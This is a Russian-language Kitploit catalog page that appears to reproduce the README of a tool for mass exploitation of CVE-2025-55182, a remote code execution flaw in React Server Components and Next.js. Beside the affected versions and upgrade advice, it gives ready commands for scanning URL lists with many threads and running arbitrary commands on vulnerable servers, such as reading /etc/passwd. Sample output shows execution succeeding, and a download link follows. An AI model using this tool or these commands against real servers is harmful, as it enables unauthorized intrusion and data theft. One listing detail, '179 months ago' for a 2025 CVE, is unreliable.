Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Scanner — Автоматический сканер для CVE-2025-55182: критическая RCE-уязвимость в React Server Components и Next.js. | Kitploit
Инструменты/GitHubGitHub/qixinlee/cve-2025-55182-scanner
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Автоматический сканер для CVE-2025-55182: критическая RCE-уязвимость в React Server Components и Next.js.

Репозиторий
179 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 Сканер RCE

Инструмент для массового обнаружения и проверки уязвимости удалённого выполнения кода CVE-2025‑55182 (React2Shell).

⚠️ Критическая уязвимость CVSS 10.0 | Затрагивает React Server Components и Next.js 15.x/16.x | Только для авторизованного тестирования безопасности

Описание уязвимости

CVE-2025‑55182 (также известная как «React2Shell») – это неаутентифицированная уязвимость удалённого выполнения кода (RCE) с максимальным рейтингом CVSS 10.0.

Уязвимость вызвана небезопасной десериализацией в пакете react-server из состава React Server Components (RSC) при обработке протокола RSC «Flight». Злоумышленник может отправить специально сформированный HTTP‑запрос и выполнить произвольный код на уязвимом сервере.

Поскольку Next.js использует протокол RSC «Flight», даже приложение, созданное с помощью create-next-app с настройками по умолчанию, может быть атаковано без необходимости написания разработчиком дополнительного кода. С 5 декабря 2025 года зафиксировано активное использование этой уязвимости.

Подверженные версии

React Server Components:

Имя пакетаПодверженные версии
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js (с App Router):

Основная версияДиапазон уязвимых версийИсправленная версия
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-

Другие потенциально уязвимые RSC‑фреймворки/инструменты:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS (режим RSC)

Временные меры смягчения

⚠️ Важное замечание: для данной уязвимости нет известных временных мер смягчения; единственный способ исправления – обновление до безопасной версии.

Рекомендуемые версии для обновления:

  • React: обновитесь до 19.0.1, 19.1.2 или 19.2.1
  • Next.js: обновитесь до 16.0.7, 15.5.7, 15.4.8 или 15.3.6

Вы также можете использовать официальный npm‑пакет fix-react2shell-next для помощи в обновлении затронутых приложений Next.js.

Установка зависимостей

pip install requests

Использование

Базовое использование

# Массовое сканирование (чтение целей из urls.txt)
python CVE-2025-55182.py -f urls.txt

# Проверка одной цели
python CVE-2025-55182.py -u http://192.168.1.100:3000

Пользовательская команда

# Выполнить команду whoami
python CVE-2025-55182.py -f urls.txt -c "whoami"

# Выполнить команду hostname
python CVE-2025-55182.py -u http://target.com -c "hostname"

# Прочитать файл
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

Расширенные параметры

# Указать количество потоков и таймаут
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# Пользовательский выходной файл
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# Тихий режим (вывод только уязвимых URL)
python CVE-2025-55182.py -f urls.txt -q

Описание параметров

ПараметрОписаниеЗначение по умолчанию
-f, --fileФайл со списком URLurls.txt
-u, --urlОдиночный целевой URL-
-t, --threadsКоличество параллельных потоков20
--timeoutТаймаут запроса (сек)10
-o, --outputВыходной CSV‑файлresults.csv
-c, --commandВыполняемая командаid
-q, --quietТихий режимfalse

Формат файла с URL

Один URL на строку, например:

http://192.168.1.10:3000
http://192.168.1.11:3000

Пример вывода

    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURATION ]
============================================================
  > Targets: 10
  > Threads: 20
  > Command: id

============================================================
  [ SCANNING ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SAFE] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

Выходной файл

Результаты сканирования сохраняются в формате CSV со следующими полями:

  • url – целевой URL
  • status – HTTP‑статус
  • vulnerable – наличие уязвимости
  • output – результат выполнения команды
  • error – сообщение об ошибке

Отказ от ответственности

Данный инструмент предназначен только для авторизованного тестирования безопасности. Не используйте его в незаконных целях. Пользователь берёт на себя все связанные риски.

Скачать инструмент